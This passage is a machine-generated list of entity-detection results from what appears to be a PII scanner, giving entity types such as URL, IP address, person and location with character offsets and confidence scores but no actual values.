0.5, type: URL, start: 11967, end: 11974, score: 0.5, type: URL, start: 12064, end: 12071, score: 0.5, type: URL, start: 12172, end: 12179, score: 0.5, type: URL, start: 12277, end: 12284, score: 0.5, type: URL, start: 13667, end: 13674, score: 0.5, type: URL, start: 13718, end: 13725, score: 0.5, type: URL, start: 13822, end: 13832, score: 0.5, type: URL, start: 13838, end: 13845, score: 0.5, type: URL, start: 13892, end: 13899, score: 0.5, type: URL, start: 13967, end: 13974, score: 0.5, type: URL, start: 14115, end: 14122, score: 0.5, type: URL, start: 14405, end: 14412, score: 0.5, type: URL, start: 14447, end: 14454, score: 0.5, type: URL, start: 14498, end: 14505, score: 0.5, type: URL, start: 17038, end: 17046, score: 0.5, type: URL, start: 17179, end: 17186, score: 0.5, type: URL, start: 17416, end: 17425, score: 0.5, type: URL, start: 17832, end: 17839, score: 0.5, type: URL, start: 18653, end: 18660, score: 0.5, type: URL, start: 18740, end: 18747, score: 0.5, type: URL, start: 18853, end: 18860, score: 0.5, type: URL, start: 18940, end: 18947, score: 0.5, type: URL, start: 19001, end: 19008, score: 0.5, type: URL, start: 20601, end: 20608, score: 0.5, type: URL, start: 20636, end: 20643, score: 0.5, type: URL, start: 20697, end: 20704, score: 0.5, type: URL, start: 20734, end: 20741, score: 0.5, type: URL, start: 20968, end: 20975, score: 0.5, type: URL, start: 21021, end: 21028, score: 0.5, type: URL, start: 21077, end: 21084, score: 0.5, type: URL, start: 21185, end: 21192, score: 0.5, type: URL, start: 21371, end: 21378, score: 0.5, type: URL, start: 21439, end: 21446, score: 0.5, type: URL, start: 21700, end: 21707, score: 0.5, type: URL, start: 21741, end: 21748, score: 0.5, type: URL, start: 21826, end: 21833, score: 0.5, type: URL, start: 22132, end: 22139, score: 0.5, type: URL, start: 22192, end: 22199, score: 0.5, type: URL, start: 22623, end: 22630, score: 0.5, type: URL, start: 22948, end: 22955, score: 0.5, type: URL, start: 22963, end: 22971, score: 0.5, type: URL, start: 23349, end: 23356, score: 0.5, type: URL, start: 23376, end: 23384, score: 0.5, type: URL, start: 23404, end: 23411, score: 0.5, type: URL, start: 23667, end: 23681, score: 0.5, type: URL, start: 23937, end: 23951, score: 0.5, type: URL, start: 25901, end: 25908, score: 0.5, type: URL, start: 25923, end: 25930, score: 0.5, type: URL, start: 25977, end: 25984, score: 0.5, type: URL, start: 26104, end: 26111, score: 0.5, type: URL, start: 26567, end: 26574, score: 0.5, type: URL, start: 27032, end: 27039, score: 0.5, type: URL, start: 27101, end: 27108, score: 0.5, type: URL, start: 27157, end: 27164, score: 0.5, type: URL, start: 27183, end: 27190, score: 0.5, type: URL, start: 27575, end: 27582, score: 0.5, type: URL, start: 27659, end: 27674, score: 0.5, type: URL, start: 27717, end: 27724, score: 0.5, type: URL, start: 28189, end: 28195, score: 0.5, type: URL, start: 28205, end: 28212, score: 0.5, type: URL, start: 28215, end: 28222, score: 0.5, type: URL, start: 28243, end: 28249, score: 0.5, type: URL, start: 28264, end: 28271, score: 0.5, type: URL, start: 28274, end: 28281, score: 0.5, type: URL, start: 28307, end: 28313, score: 0.5, type: URL, start: 28326, end: 28333, score: 0.5, type: URL, start: 28336, end: 28343, score: 0.5, type: URL, start: 28643, end: 28650, score: 0.5, type: URL, start: 28688, end: 28695, score: 0.5, type: URL, start: 28724, end: 28731, score: 0.5, type: URL, start: 28734, end: 28741, score: 0.5, type: URL, start: 28816, end: 28823, score: 0.5, type: URL, start: 28826, end: 28833, score: 0.5, type: URL, start: 28908, end: 28915, score: 0.5, type: URL, start: 28918, end: 28925, score: 0.5, type: URL, start: 28998, end: 29005, score: 0.5, type: URL, start: 29066, end: 29073, score: 0.5, type: URL, start: 29076, end: 29083, score: 0.5, type: URL, start: 29139, end: 29146, score: 0.5, type: URL, start: 29149, end: 29156, score: 0.5, type: URL, start: 29505, end: 29512, score: 0.5, type: URL, start: 29531, end: 29538, score: 0.5, type: URL, start: 29608, end: 29615, score: 0.5, type: URL, start: 29927, end: 29938, score: 0.5, type: URL, start: 29970, end: 29977, score: 0.5, type: URL, start: 30003, end: 30010, score: 0.5, type: URL, start: 30020, end: 30027, score: 0.5, type: URL, start: 30248, end: 30259, score: 0.5, type: URL, start: 30279, end: 30286, score: 0.5, type: URL, start: 30433, end: 30440, score: 0.5, type: URL, start: 30501, end: 30508, score: 0.5, type: URL, start: 30565, end: 30572, score: 0.5, type: URL, start: 30658, end: 30665, score: 0.5, type: URL, start: 30700, end: 30707, score: 0.5, type: URL, start: 30734, end: 30741, score: 0.5, type: URL, start: 30807, end: 30814, score: 0.5, type: URL, start: 30870, end: 30877, score: 0.5, type: URL, start: 30931, end: 30938, score: 0.5, type: URL, start: 30991, end: 31005, score: 0.5, type: URL, start: 31965, end: 31972, score: 0.5, type: URL, start: 32088, end: 32095, score: 0.5, type: URL, start: 32193, end: 32200, score: 0.5, type: URL, start: 32271, end: 32278, score: 0.5, type: URL, start: 32490, end: 32497, score: 0.5, type: URL, start: 32631, end: 32638, score: 0.5, type: URL, start: 32646, end: 32653, score: 0.5, type: URL, start: 32725, end: 32732, score: 0.5, type: URL, start: 32740, end: 32747, score: 0.5, type: URL, start: 32821, end: 32828, score: 0.5, type: URL, start: 32836, end: 32843, score: 0.5, type: URL, start: 32919, end: 32926, score: 0.5, type: URL, start: 32934, end: 32941, score: 0.5, type: URL, start: 33017, end: 33024, score: 0.5, type: URL, start: 33032, end: 33039, score: 0.5, type: URL, start: 33114, end: 33121, score: 0.5, type: URL, start: 33129, end: 33136, score: 0.5, type: URL, start: 33209, end: 33216, score: 0.5, type: URL, start: 33282, end: 33289, score: 0.5, type: URL, start: 33297, end: 33304, score: 0.5, type: URL, start: 33360, end: 33367, score: 0.5, type: URL, start: 33375, end: 33382, score: 0.5, type: URL, start: 33455, end: 33462, score: 0.5, type: URL, start: 33484, end: 33491, score: 0.5, type: URL, start: 33511, end: 33518, score: 0.5, type: URL, start: 33623, end: 33630, score: 0.5, type: URL, start: 33652, end: 33659, score: 0.5, type: URL, start: 33679, end: 33686, score: 0.5, type: URL, start: 33778, end: 33785, score: 0.5, type: URL, start: 33862, end: 33869, score: 0.5, type: URL, start: 33971, end: 33978, score: 0.5, type: URL, start: 34061, end: 34068, score: 0.5, type: URL, start: 34090, end: 34097, score: 0.5, type: URL, start: 34117, end: 34124, score: 0.5, type: URL, start: 34240, end: 34247, score: 0.5, type: URL, start: 34269, end: 34276, score: 0.5, type: URL, start: 34296, end: 34303, score: 0.5, type: URL, start: 34408, end: 34415, score: 0.5, type: URL, start: 34525, end: 34532, score: 0.5, type: URL, start: 34615, end: 34622, score: 0.5, type: URL, start: 34690, end: 34697, score: 0.5, type: URL, start: 34773, end: 34780, score: 0.5, type: URL, start: 34858, end: 34865, score: 0.5, type: URL, start: 34943, end: 34950, score: 0.5, type: URL, start: 35019, end: 35026, score: 0.5, type: URL, start: 36151, end: 36158, score: 0.5, type: URL, start: 36248, end: 36256, score: 0.5, type: URL, start: 36414, end: 36421, score: 0.5, type: URL, start: 36509, end: 36516, score: 0.5, type: URL, start: 36604, end: 36611, score: 0.5, type: URL, start: 36698, end: 36705, score: 0.5, type: URL, start: 36860, end: 36867, score: 0.5, type: URL, start: 36935, end: 36942, score: 0.5, type: URL, start: 37100, end: 37107, score: 0.5, type: URL, start: 37455, end: 37462, score: 0.5, type: URL, start: 37652, end: 37659, score: 0.5, type: URL, start: 38283, end: 38294, score: 0.5, type: URL, start: 38326, end: 38333, score: 0.5, type: URL, start: 38628, end: 38639, score: 0.5, type: URL, start: 39596, end: 39606, score: 0.5, type: URL, start: 40823, end: 40833, score: 0.5, type: URL, start: 40847, end: 40854, score: 0.5, type: URL, start: 40929, end: 40934, score: 0.5, type: URL, start: 40958, end: 40963, score: 0.5, type: URL, start: 41286, end: 41295, score: 0.5, type: URL, start: 41331, end: 41340, score: 0.5, type: URL, start: 41373, end: 41383, score: 0.5, type: URL, start: 41581, end: 41588, score: 0.5, type: IP_ADDRESS, start: 6089, end: 6098, score: 0.95, type: IP_ADDRESS, start: 11634, end: 11643, score: 0.95, type: PERSON, start: 4677, end: 4687, score: 0.85, type: DATE_TIME, start: 7227, end: 7233, score: 0.85, type: PERSON, start: 7301, end: 7311, score: 0.85, type: URL, start: 11995, end: 12021, score: 0.85, type: URL, start: 12385, end: 12419, score: 0.85, type: URL, start: 12447, end: 12456, score: 0.85, type: URL, start: 12620, end: 12629, score: 0.85, type: URL, start: 12727, end: 12753, score: 0.85, type: URL, start: 13634, end: 13660, score: 0.85, type: PERSON, start: 16662, end: 16673, score: 0.85, type: DATE_TIME, start: 17717, end: 17723, score: 0.85, type: PERSON, start: 18086, end: 18100, score: 0.85, type: PERSON, start: 19880, end: 19891, score: 0.85, type: PERSON, start: 21674, end: 21687, score: 0.85, type: URL, start: 459, end: 466, score: 0.5, type: URL, start: 540, end: 566, score: 0.5, type: URL, start: 628, end: 654, score: 0.5, type: URL, start: 738, end: 772, score: 0.5, type: URL, start: 805, end: 812, score: 0.5, type: URL, start: 887, end: 894, score: 0.5, type: URL, start: 1116, end: 1142, score: 0.5, type: URL, start: 1210, end: 1244, score: 0.5, type: URL, start: 1272, end: 1287, score: 0.5, type: URL, start: 1323, end: 1349, score: 0.5, type: URL, start: 1411, end: 1437, score: 0.5, type: URL, start: 1493, end: 1500, score: 0.5, type: URL, start: 1581, end: 1600, score: 0.5, type: URL, start: 1638, end: 1658, score: 0.5, type: URL, start: 1687, end: 1706, score: 0.5, type: URL, start: 1797, end: 1823, score: 0.5, type: URL, start: 1901, end: 1935, score: 0.5, type: URL, start: 1968, end: 1975, score: 0.5, type: URL, start: 2046, end: 2072, score: 0.5, type: URL, start: 2139, end: 2165, score: 0.5, type: URL, start: 2230, end: 2256, score: 0.5, type: URL, start: 2326, end: 2352, score: 0.5, type: URL, start: 2420, end: 2439, score: 0.5, type: URL, start: 2477, end: 2497, score: 0.5, type: URL, start: 2530, end: 2556, score: 0.5, type: URL, start: 2636, end: 2662, score: 0.5, type: URL, start: 2734, end: 2768, score: 0.5, type: URL, start: 2801, end: 2808, score: 0.5, type: URL, start: 2890, end: 2916, score: 0.5, type: URL, start: 3075, end: 3101, score: 0.5, type: URL, start: 3163, end: 3189, score: 0.5, type: URL, start: 3403, end: 3437, score: 0.5, type: URL, start: 3505, end: 3531, score: 0.5, type: URL, start: 3594, end: 3620, score: 0.5, type: URL, start: 3697, end: 3731, score: 0.5, type: URL, start: 3759, end: 3766, score: 0.5, type: URL, start: 3794, end: 3803, score: 0.5, type: URL, start: 3885, end: 3919, score: 0.5, type: URL, start: 4028, end: 4037, score: 0.5, type: URL, start: 4077, end: 4111, score: 0.5, type: URL, start: 4139, end: 4146, score: 0.5, type: URL, start: 4180, end: 4214, score: 0.5, type: URL, start: 4271, end: 4281, score: 0.5, type: URL, start: 4312, end: 4338, score: 0.5, type: URL, start: 4466, end: 4475, score: 0.5, type: URL, start: 4564, end: 4590, score: 0.5, type: URL, start: 4653, end: 4672, score: 0.5, type: URL, start: 4747, end: 4781, score: 0.5, type: URL, start: 4897, end: 4904, score: 0.5, type: URL, start: 4933, end: 4959, score: 0.5, type: URL, start: 5027, end: 5061, score: 0.5, type: URL, start: 5160, end: 5167, score: 0.5, type: URL, start: 5198, end: 5224, score: 0.5, type: URL, start: 5307, end: 5334, score: 0.5, type: URL, start: 5388, end: 5398, score: 0.5, type: URL, start: 5482, end: 5508, score: 0.5, type: URL, start: 5572, end: 5606, score: 0.5, type: URL, start: 5716, end: 5723, score: 0.5, type: URL, start: 5758, end: 5792, score: 0.5, type: URL, start: 5902, end: 5911, score: 0.5, type: URL, start: 5944, end: 5970, score: 0.5, type: URL, start: 6030, end: 6049, score: 0.5, type: URL, start: 6148, end: 6174, score: 0.5, type: URL, start: 6241, end: 6267, score: 0.5, type: URL, start: 6339, end: 6373, score: 0.5, type: URL, start: 6482, end: 6492, score: 0.5, type: URL, start: 6535, end: 6569, score: 0.5, type: URL, start: 6660, end: 6669, score: 0.5, type: URL, start: 6725, end: 6751, score: 0.5, type: URL, start: 6824, end: 6858, score: 0.5, type: URL, start: 6905, end: 6915, score: 0.5, type: URL, start: 6990, end: 7024, score: 0.5, type: URL, start: 7123, end: 7132, score: 0.5, type: URL, start: 7172, end: 7198, score: 0.5, type: URL, start: 7277, end: 7296, score: 0.5, type: URL, start: 7390, end: 7416, score: 0.5, type: URL, start: 7484, end: 7511, score: 0.5, type: URL, start: 7669, end: 7695, score: 0.5, type: URL, start: 7778, end: 7805, score: 0.5, type: URL, start: 7859, end: 7869, score: 0.5, type: URL, start: 7959, end: 7993, score: 0.5, type: URL, start: 8048, end: 8058, score: 0.5, type: URL, start: 8089, end: 8115, score: 0.5, type: URL, start: 8175, end: 8194, score: 0.5, type: URL, start: 8337, end: 8364, score: 0.5, type: URL, start: 8409, end: 8435, score: 0.5, type: URL, start: 8517, end: 8551, score: 0.5, type: URL, start: 8606, end: 8613, score: 0.5, type: URL, start: 8641, end: 8651, score: 0.5, type: URL, start: 8759, end: 8793, score: 0.5, type: URL, start: 8821, end: 8831, score: 0.5, type: URL, start: 8862, end: 8888, score: 0.5, type: URL, start: 8955, end: 8989, score: 0.5, type: URL, start: 9017, end: 9024, score: 0.5, type: URL, start: 9071, end: 9090, score: 0.5, type: URL, start: 9207, end: 9241, score: 0.5, type: URL, start: 9313, end: 9320, score: 0.5, type: URL, start: 9357, end: 9384, score: 0.5, type: URL, start: 9424, end: 9434, score: 0.5, type: URL, start: 9519, end: 9545, score: 0.5, type: URL, start: 9610, end: 9644, score: 0.5, type: URL, start: 9672, end: 9682, score: 0.5, type: URL, start: 9713, end: 9739, score: 0.5, type: URL, start: 9870, end: 9904, score: 0.5, type: URL, start: 9932, end: 9939, score: 0.5, type: URL, start: 9967, end: 9977, score: 0.5, type: URL, start: 10073, end: 10107, score: 0.5, type: URL, start: 10165, end: 10175, score: 0.5, type: URL, start: 10216, end: 10242, score: 0.5, type: URL, start: 10334, end: 10360, score: 0.5, type: URL, start: 10420, end: 10439, score: 0.5, type: URL, start: 10582, end: 10609, score: 0.5, type: URL, start: 10652, end: 10686, score: 0.5, type: URL, start: 10733, end: 10740, score: 0.5, type: URL, start: 10801, end: 10811, score: 0.5, type: URL, start: 10913, end: 10947, score: 0.5, type: URL, start: 10975, end: 10985, score: 0.5, type: URL, start: 11016, end: 11042, score: 0.5, type: URL, start: 11104, end: 11138, score: 0.5, type: URL, start: 11166, end: 11173, score: 0.5, type: URL, start: 11201, end: 11210, score: 0.5, type: URL, start: 11291, end: 11317, score: 0.5, type: URL, start: 11383, end: 11409, score: 0.5, type: URL, start: 11469, end: 11495, score: 0.5, type: URL, start: 11575, end: 11594, score: 0.5, type: URL, start: 11695, end: 11729, score: 0.5, type: URL, start: 11819, end: 11828, score: 0.5, type: URL, start: 11868, end: 11894, score: 0.5, type: URL, start: 12123, end: 12157, score: 0.5, type: URL, start: 12266, end: 12275, score: 0.5, type: URL, start: 12539, end: 12566, score: 0.5, type: URL, start: 12920, end: 12946, score: 0.5, type: URL, start: 13022, end: 13048, score: 0.5, type: URL, start: 13213, end: 13232, score: 0.5, type: URL, start: 13305, end: 13331, score: 0.5, type: URL, start: 13387, end: 13413, score: 0.5, type: URL, start: 13485, end: 13519, score: 0.5, type: URL, start: 13585, end: 13595, score: 0.5, type: URL, start: 13880, end: 13906, score: 0.5, type: URL, start: 13982, end: 14008, score: 0.5, type: URL, start: 14078, end: 14104, score: 0.5, type: URL, start: 14167, end: 14201, score: 0.5, type: URL, start: 14324, end: 14331, score: 0.5, type: URL, start: 14365, end: 14399, score: 0.5, type: URL, start: 14522, end: 14529, score: 0.5, type: URL, start: 14657, end: 14683, score: 0.5, type: URL, start: 14745, end: 14771, score: 0.5, type: URL, start: 14840, end: 14866, score: 0.5, type: URL, start: 14928, end: 14947, score: 0.5, type: URL, start: 15023, end: 15049, score: 0.5, type: URL, start: 15202, end: 15228, score: 0.5, type: URL, start: 15288, end: 15314, score: 0.5, type: URL, start: 15353, end: 15360, score: 0.5, type: URL, start: 15439, end: 15448, score: 0.5, type: URL, start: 15592, end: 15626, score: 0.5, type: URL, start: 15685, end: 15694, score: 0.5, type: URL, start: 15727, end: 15753, score: 0.5, type: URL, start: 15815, end: 15849, score: 0.5, type: URL, start: 15908, end: 15915, score: 0.5, type: URL, start: 15943, end: 15952, score: 0.5, type: URL, start: 16038, end: 16064, score: 0.5, type: URL, start: 16139, end: 16165, score: 0.5, type: URL, start: 16230, end: 16264, score: 0.5, type: URL, start: 16378, end: 16385, score: 0.5, type: URL, start: 16419, end: 16453, score: 0.5, type: URL, start: 16567, end: 16574, score: 0.5, type: URL, start: 16602, end: 16611, score: 0.5, type: URL, start: 16701, end: 16735, score: 0.5, type: URL, start: 16763, end: 16770, score: 0.5, type: URL, start: 16799, end: 16825, score: 0.5, type: URL, start: 16888, end: 16914, score: 0.5, type: URL, start: 17054, end: 17063, score: 0.5, type: URL, start: 17156, end: 17190, score: 0.5, type: URL, start: 17218, end: 17227, score: 0.5, type: URL, start: 17259, end: 17285, score: 0.5, type: URL, start: 17347, end: 17381, score: 0.5, type: URL, start: 17409, end: 17416, score: 0.5, type: URL, start: 17444, end: 17453, score: 0.5, type: URL, start: 17537, end: 17571, score: 0.5, type: URL, start: 17599, end: 17608, score: 0.5, type: URL, start: 17662, end: 17688, score: 0.5, type: URL, start: 17777, end: 17803, score: 0.5, type: URL, start: 17881, end: 17907, score: 0.5, type: URL, start: 17976, end: 18002, score: 0.5, type: URL, start: 18105, end: 18132, score: 0.5, type: URL, start: 18214, end: 18241, score: 0.5, type: URL, start: 18297, end: 18323, score: 0.5, type: URL, start: 18394, end: 18420, score: 0.5, type: URL, start: 18515, end: 18541, score: 0.5, type: URL, start: 18615, end: 18641, score: 0.5, type: URL, start: 18712, end: 18746, score: 0.5, type: URL, start: 18774, end: 18784, score: 0.5, type: URL, start: 18940, end: 18966, score: 0.5, type: URL, start: 19045, end: 19071, score: 0.5, type: URL, start: 19110, end: 19117, score: 0.5, type: URL, start: 19163, end: 19172, score: 0.5, type: URL, start: 19274, end: 19301, score: 0.5, type: URL, start: 19342, end: 19368, score: 0.5, type: URL, start: 19435, end: 19469, score: 0.5, type: URL, start: 19497, end: 19504, score: 0.5, type: URL, start: 19551, end: 19570, score: 0.5, type: URL, start: 19687, end: 19721, score: 0.5, type: URL, start: 19785, end: 19792, score: 0.5, type: URL, start: 19820, end: 19829, score: 0.5, type: URL, start: 19920, end: 19954, score: 0.5, type: URL, start: 20001, end: 20011, score: 0.5, type: URL, start: 20170, end: 20189, score: 0.5, type: URL, start: 20245, end: 20271, score: 0.5, type: URL, start: 20331, end: 20357, score: 0.5, type: URL, start: 20494, end: 20521, score: 0.5, type: URL, start: 20578, end: 20612, score: 0.5, type: URL, start: 20675, end: 20682, score: 0.5, type: URL, start: 20905, end: 20931, score: 0.5, type: URL, start: 20998, end: 21032, score: 0.5, type: URL, start: 21060, end: 21067, score: 0.5, type: URL, start: 21113, end: 21128, score: 0.5, type: URL, start: 21331, end: 21357, score: 0.5, type: URL, start: 21415, end: 21441, score: 0.5, type: URL, start: 21504, end: 21530, score: 0.5, type: URL, start: 21590, end: 21616, score: 0.5, type: EMAIL_ADDRESS, start: 7604, end: 7619, score: 1.0, type: EMAIL_ADDRESS, start: 12136, end: 12151, score: 1.0, type: IP_ADDRESS, start: 8546, end: 8555, score: 0.95, type: IP_ADDRESS, start: 8642, end: 8651, score: 0.95, type: IP_ADDRESS, start: 12758, end: 12767, score: 0.95, type: IP_ADDRESS, start: 12814, end: 12823, score: 0.95, type: NRP, start: 470, end: 481, score: 0.85, type: PERSON, start: 673, end: 685, score: 0.85, type: LOCATION, start: 1033, end: 1044, score: 0.85, type: LOCATION, start: 1259, end: 1265, score: 0.85, type: LOCATION, start: 1734, end: 1748, score: 0.85, type: PERSON, start: 2997, end: 3008, score: 0.85, type: NRP, start: 3096, end: 3107, score: 0.85, type: PERSON, start: 4481, end: 4499, score: 0.85, type: PERSON, start: 4703, end: 4721, score: 0.85, type: LOCATION, start: 4739, end: 4763, score: 0.85, type: LOCATION, start: 4960, end: 4979, score: 0.85, type: LOCATION, start: 5770, end: 5790, score: 0.85, type: LOCATION, start: 5908, end: 5927, score: 0.85, type: PERSON, start: 6475, end: 6482, score: 0.85, type: LOCATION, start: 6652, end: 6665, score: 0.85, type: PERSON, start: 7361, end: 7365, score: 0.85, type: DATE_TIME, start: 7384, end: 7386, score: 0.85, type: DATE_TIME, start: 7440, end: 7442, score: 0.85, type: DATE_TIME, start: 7476, end: 7478, score: 0.85, type: DATE_TIME, start: 7549, end: 7551, score: 0.85, type: DATE_TIME, start: 7589, end: 7591, score: 0.85, type: DATE_TIME, start: 7638, end: 7640, score: 0.85, type: DATE_TIME, start: 7675, end: 7677, score: 0.85, type: DATE_TIME, start: 7710, end: 7712, score: 0.85, type: DATE_TIME, start: 7770, end: 7772, score: 0.85, type: DATE_TIME, start: 7806, end: 7808, score: 0.85, type: DATE_TIME, start: 7840, end: 7842, score: 0.85, type: DATE_TIME, start: 7895, end: 7897, score: 0.85, type: DATE_TIME, start: 7935, end: 7937, score: 0.85, type: DATE_TIME, start: 7973, end: 7975, score: 0.85, type: LOCATION, start: 7977, end: 7988, score: 0.85, type: DATE_TIME, start: 8033, end: 8035, score: 0.85, type: LOCATION, start: 8037, end: 8048, score: 0.85, type: DATE_TIME, start: 8094, end: 8096, score: 0.85, type: LOCATION, start: 8098, end: 8109, score: 0.85, type: DATE_TIME, start: 8151, end: 8153, score: 0.85, type: LOCATION, start: 8155, end: 8166, score: 0.85, type: DATE_TIME, start: 8190, end: 8192, score: 0.85, type: DATE_TIME, start: 8229, end: 8231, score: 0.85, type: DATE_TIME, start: 8269, end: 8271, score: 0.85, type: DATE_TIME, start: 8305, end: 8307, score: 0.85, type: DATE_TIME, start: 8342, end: 8344, score: 0.85, type: DATE_TIME, start: 8359, end: 8368, score: 0.85, type: DATE_TIME, start: 8386, end: 8388, score: 0.85, type: DATE_TIME, start: 8431, end: 8433, score: 0.85, type: DATE_TIME, start: 8467, end: 8469, score: 0.85, type: DATE_TIME, start: 8526, end: 8528, score: 0.85, type: DATE_TIME, start: 8574, end: 8576, score: 0.85, type: DATE_TIME, start: 8615, end: 8617, score: 0.85, type: DATE_TIME, start: 8670, end: 8672, score: 0.85, type: DATE_TIME, start: 8762, end: 8765, score: 0.85, type: NRP, start: 9061, end: 9069, score: 0.85, type: NRP, start: 9110, end: 9118, score: 0.85, type: NRP, start: 9147, end: 9155, score: 0.85, type: PERSON, start: 9734, end: 9738, score: 0.85, type: LOCATION, start: 10029, end: 10036, score: 0.85, type: DATE_TIME, start: 10038, end: 10041, score: 0.85, type: LOCATION, start: 10131, end: 10138, score: 0.85, type: LOCATION, start: 10187, end: 10194, score: 0.85, type: LOCATION, start: 10526, end: 10533, score: 0.85, type: DATE_TIME, start: 10535, end: 10538, score: 0.85, type: LOCATION, start: 10563, end: 10570, score: 0.85, type: LOCATION, start: 10572, end: 10575, score: 0.85, type: LOCATION, start: 10645, end: 10652, score: 0.85, type: DATE_TIME, start: 10654, end: 10657, score: 0.85, type: LOCATION, start: 10745, end: 10752, score: 0.85, type: NRP, start: 11096, end: 11102, score: 0.85, type: NRP, start: 11220, end: 11226, score: 0.85, type: NRP, start: 11282, end: 11288, score: 0.85, type: NRP, start: 11344, end: 11350, score: 0.85, type: NRP, start: 11584, end: 11590, score: 0.85, type: LOCATION, start: 12290, end: 12303, score: 0.85, type: LOCATION, start: 12351, end: 12364, score: 0.85, type: LOCATION, start: 12413, end: 12426, score: 0.85, type: DATE_TIME, start: 12604, end: 12613, score: 0.85, type: LOCATION, start: 13122, end: 13125, score: 0.85, type: NRP, start: 13544, end: 13557, score: 0.85, type: NRP, start: 13628, end: 13641, score: 0.85, type: NRP, start: 13716, end: 13729, score: 0.85, type: DATE_TIME, start: 14116, end: 14120, score: 0.85, type: NRP, start: 17634, end: 17643, score: 0.85, type: LOCATION, start: 17723, end: 17731, score: 0.85, type: NRP, start: 18822, end: 18831, score: 0.85, type: LOCATION, start: 18911, end: 18919, score: 0.85, type: NRP, start: 19566, end: 19575, score: 0.85, type: LOCATION, start: 19670, end: 19678, score: 0.85, type: NRP, start: 20150, end: 20159, score: 0.85, type: LOCATION, start: 20287, end: 20295, score: 0.85, type: PERSON, start: 21627, end: 21660, score: 0.85, type: URL, start: 21535, end: 21566, score: 0.6, type: URL, start: 470, end: 479, score: 0.5, type: URL, start: 506, end: 520, score: 0.5, type: URL, start: 565, end: 591, score: 0.5, type: URL, start: 627, end: 641, score: 0.5, type: URL, start: 732, end: 741, score: 0.5, type: URL, start: 2163, end: 2178, score: 0.5, type: URL, start: 2326, end: 2341, score: 0.5, type: URL, start: 2402, end: 2418, score: 0.5, type: URL, start: 2559, end: 2574, score: 0.5, type: URL, start: 2690, end: 2705, score: 0.5, type: URL, start: 2847, end: 2862, score: 0.5, type: URL, start: 3114, end: 3129, score: 0.5, type: URL, start: 3268, end: 3283, score: 0.5, type: URL, start: 3418, end: 3433, score: 0.5, type: URL, start: 3842, end: 3857, score: 0.5, type: URL, start: 3928, end: 3943, score: 0.5, type: URL, start: 3973, end: 3989, score: 0.5, type: URL, start: 4165, end: 4181, score: 0.5, type: URL, start: 4247, end: 4258, score: 0.5, type: URL, start: 4530, end: 4541, score: 0.5, type: URL, start: 4798, end: 4814, score: 0.5, type: URL, start: 4827, end: 4838, score: 0.5, type: URL, start: 4876, end: 4887, score: 0.5, type: URL, start: 5014, end: 5030, score: 0.5, type: URL, start: 5043, end: 5054, score: 0.5, type: URL, start: 5148, end: 5164, score: 0.5, type: URL, start: 5177, end: 5188, score: 0.5, type: URL, start: 5205, end: 5211, score: 0.5, type: URL, start: 5315, end: 5331, score: 0.5, type: URL, start: 5467, end: 5483, score: 0.5, type: URL, start: 5496, end: 5507, score: 0.5, type: URL, start: 5553, end: 5564, score: 0.5, type: URL, start: 5640, end: 5651, score: 0.5, type: URL, start: 5710, end: 5721, score: 0.5, type: URL, start: 5825, end: 5841, score: 0.5, type: URL, start: 5858, end: 5869, score: 0.5, type: URL, start: 5962, end: 5978, score: 0.5, type: URL, start: 5995, end: 6006, score: 0.5, type: URL, start: 6103, end: 6119, score: 0.5, type: URL, start: 6149, end: 6156, score: 0.5, type: URL, start: 6171, end: 6182, score: 0.5, type: URL, start: 6806, end: 6812, score: 0.5, type: URL, start: 7610, end: 7619, score: 0.5, type: URL, start: 7990, end: 8000, score: 0.5, type: URL, start: 8050, end: 8060, score: 0.5, type: URL, start: 8111, end: 8121, score: 0.5, type: URL, start: 12142, end: 12151, score: 0.5, type: URL, start: 12305, end: 12315, score: 0.5, type: URL, start: 12366, end: 12376, score: 0.5, type: URL, start: 12428, end: 12438, score: 0.5, type: URL, start: 14420, end: 14443, score: 0.5, type: URL, start: 14602, end: 14609, score: 0.5, type: URL, start: 14854, end: 14876, score: 0.5, type: URL, start: 15300, end: 15307, score: 0.5, type: URL, start: 15355, end: 15369, score: 0.5, type: URL, start: 15408, end: 15415, score: 0.5, type: URL, start: 15449, end: 15463, score: 0.5, type: URL, start: 15579, end: 15586, score: 0.5, type: URL, start: 15640, end: 15654, score: 0.5, type: URL, start: 15687, end: 15694, score: 0.5, type: URL, start: 15704, end: 15719, score: 0.5, type: URL, start: 15801, end: 15808, score: 0.5, type: URL, start: 15960, end: 15967, score: 0.5, type: URL, start: 16015, end: 16029, score: 0.5, type: URL, start: 16118, end: 16125, score: 0.5, type: URL, start: 16182, end: 16196, score: 0.5, type: URL, start: 16361, end: 16368, score: 0.5, type: URL, start: 16425, end: 16439, score: 0.5, type: URL, start: 16535, end: 16555, score: 0.5, type: URL, start: 16598, end: 16618, score: 0.5, type: URL, start: 16646, end: 16671, score: 0.5, type: URL, start: 16705, end: 16735, score: 0.5, type: URL, start: 16759, end: 16773, score: 0.5, type: URL, start: 16824, end: 16838, score: 0.5, type: URL, start: 16896, end: 16910, score: 0.5, type: URL, start: 16955, end: 16962, score: 0.5, type: URL, start: 16989, end: 16996, score: 0.5, type: URL, start: 17024, end: 17031, score: 0.5, type: URL, start: 17064, end: 17071, score: 0.5, type: URL, start: 17283, end: 17296, score: 0.5, type: URL, start: 17510, end: 17526, score: 0.5, type: URL, start: 17608, end: 17622, score: 0.5, type: URL, start: 17684, end: 17698, score: 0.5, type: URL, start: 17749, end: 17763, score: 0.5, type: URL, start: 17807, end: 17813, score: 0.5, type: URL, start: 18127, end: 18135, score: 0.5, type: URL, start: 18150, end: 18157, score: 0.5, type: URL, start: 18174, end: 18190, score: 0.5, type: URL, start: 18201, end: 18214, score: 0.5, type: URL, start: 18234, end: 18240, score: 0.5, type: URL, start: 18566, end: 18579, score: 0.5, type: URL, start: 18793, end: 18809, score: 0.5, type: URL, start: 18872, end: 18886, score: 0.5, type: URL, start: 18968, end: 18982, score: 0.5, type: URL, start: 19026, end: 19032, score: 0.5, type: URL, start: 19358, end: 19366, score: 0.5, type: URL, start: 19381, end: 19388, score: 0.5, type: URL, start: 19405, end: 19421, score: 0.5, type: URL, start: 19535, end: 19541, score: 0.5, type: URL, start: 19633, end: 19647, score: 0.5, type: URL, start: 19726, end: 19740, score: 0.5, type: URL, start: 19867, end: 19874, score: 0.5, type: URL, start: 19884, end: 19900, score: 0.5, type: URL, start: 19919, end: 19926, score: 0.5, type: URL, start: 19936, end: 19952, score: 0.5, type: URL, start: 19966, end: 19973, score: 0.5, type: URL, start: 19983, end: 19999, score: 0.5, type: URL, start: 20119, end: 20125, score: 0.5, type: URL, start: 20209, end: 20215, score: 0.5, type: URL, start: 20250, end: 20264, score: 0.5, type: URL, start: 20381, end: 20395, score: 0.5, 